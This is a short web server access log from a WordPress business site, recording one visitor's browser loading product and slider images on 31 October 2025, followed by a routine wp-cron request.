205.169.39.54 - - [31/Oct/2025:08:28:14 +0800] "GET /wp-content/uploads/2025/07/1751425283-qizhou.kf_.qq_.com_.webp HTTP/1.1" 200 16864 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.54 - - [31/Oct/2025:08:28:18 +0800] "GET /wp-content/uploads/2025/07/1750174127-Marketing1920x800_3.webp HTTP/1.1" 200 52790 "http://cqqizhou.com/wp-content/uploads/elementor/css/post-1666.css?ver=1756373176" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.54 - - [31/Oct/2025:08:28:20 +0800] "GET /wp-content/uploads/2025/07/1753454299-Article_images_W900px.webp HTTP/1.1" 200 52418 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.54 - - [31/Oct/2025:08:28:20 +0800] "GET /wp-content/uploads/2025/07/1753454089-Article_images_W900px.webp HTTP/1.1" 200 27552 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.54 - - [31/Oct/2025:08:28:22 +0800] "GET /wp-content/uploads/revslider/slider-1/1750929639-yuanjing_Slider_3840%C3%972160_20250626171955-scaled.webp HTTP/1.1" 200 203290 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.54 - - [31/Oct/2025:08:28:23 +0800] "GET /wp-content/uploads/2025/07/1753456723-%E5%8F%8C%E7%9B%B8%E9%92%A2roduct_Single600.webp HTTP/1.1" 200 22790 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.54 - - [31/Oct/2025:08:28:23 +0800] "GET /wp-content/uploads/2025/07/1753453127-%E4%BD%99%E5%8D%B7product_Single600%C3%97284.webp HTTP/1.1" 200 18744 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.54 - - [31/Oct/2025:08:28:23 +0800] "GET /wp-content/uploads/2025/07/1753456770-%E7%83%AD%E9%95%80%E9%94%8C%E5%8D%B7product_Single600.webp HTTP/1.1" 200 27502 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.54 - - [31/Oct/2025:08:28:23 +0800] "GET /wp-content/uploads/2025/07/1753453096-%E5%8F%8C%E7%9B%B8%E9%92%A2product_Single600%C3%97284.webp HTTP/1.1" 200 14562 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.54 - - [31/Oct/2025:08:28:23 +0800] "GET /wp-content/uploads/2025/07/1753587901-Slider_3840%C3%972160_20250727-scaled-50x100.webp HTTP/1.1" 200 1660 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.54 - - [31/Oct/2025:08:28:23 +0800] "GET /wp-content/uploads/revslider/slider-1/1750861156-logistics_Slider_3840%C3%972160_20250625191356-scaled-50x100.webp HTTP/1.1" 200 1416 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.54 - - [31/Oct/2025:08:28:24 +0800] "GET /wp-content/uploads/revslider/slider-1/1750861156-logistics_Slider_3840%C3%972160_20250625191356-scaled-50x100.webp HTTP/1.1" 200 1416 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.54 - - [31/Oct/2025:08:28:24 +0800] "GET /wp-content/uploads/2025/07/1753587901-Slider_3840%C3%972160_20250727-scaled-50x100.webp HTTP/1.1" 200 1660 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
36.133.115.36 - - [31/Oct/2025:08:28:24 +0800] "POST /wp-cron.php?doing_wp_cron=1761870504.4142110347747802734375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
